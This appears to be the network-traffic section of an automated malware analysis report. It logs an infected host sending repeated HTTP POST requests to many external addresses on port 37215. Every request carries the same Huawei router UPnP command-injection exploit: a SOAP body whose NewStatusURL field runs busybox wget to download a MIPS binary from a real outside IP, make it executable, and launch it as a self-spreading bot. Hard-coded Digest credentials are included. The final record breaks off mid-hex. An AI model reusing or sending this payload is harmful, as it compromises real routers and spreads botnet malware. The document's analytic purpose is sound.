                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1851192.168.2.1339666157.232.36.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547230005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1852192.168.2.1345036197.80.243.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547243118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1853192.168.2.1340966157.206.221.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547286987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1854192.168.2.134208441.167.113.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547365904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1855192.168.2.1346114157.110.241.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547422886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1856192.168.2.1335416197.232.85.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547429085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1857192.168.2.1350240157.1.78.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547719955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1858192.168.2.134630253.212.251.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547770977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1859192.168.2.134732083.183.217.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547866106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1860192.168.2.135596641.199.98.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547871113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 